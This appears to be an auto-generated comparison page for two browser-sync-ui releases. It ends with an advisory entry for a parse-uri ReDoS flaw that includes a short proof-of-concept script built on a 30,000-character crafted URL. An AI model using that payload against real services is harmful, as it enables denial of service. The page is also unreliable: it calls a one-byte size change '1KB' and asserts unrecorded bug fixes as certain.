Browser-sync-ui is a user interface (UI) package designed to enhance the development experience with BrowserSync. Versions 2.26.10 and 2.26.9 are very similar, sharing the same core dependencies like immutable, server-destroy, stream-throttle, socket.io-client, async-each-series, and connect-history-api-fallback. These dependencies ensure the UI functions smoothly and integrates well with BrowserSync's features, providing real-time updates and a streamlined workflow. Both versions also share the same suite of developer tools, including chai, mocha, sinon for testing, and webpack for module bundling. Other notable development dependencies encompass tools for linting (jshint), SVG handling (easy-svg), and code formatting (pretty-js).
The primary difference between the two versions lies in their release dates. Version 2.26.10 was released on July 17, 2020, while version 2.26.9 was released on July 16, 2020, a single day prior. In addition to the release date difference, the unpacked size increased by 1KB from 4785696 to 4785697. Also, the later version may include minor bug fixes, performance improvements, or very subtle UI tweaks not explicitly documented in the metadata but for sure existing to justify the publish of the new version. For developers, this suggests a commitment to maintaining and incrementally improving the BrowserSync UI. While the changes may appear minimal, staying up-to-date ensures access to the most refined and stable version of the UI.
All the vulnerabilities related to the version 2.26.10 of the package
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();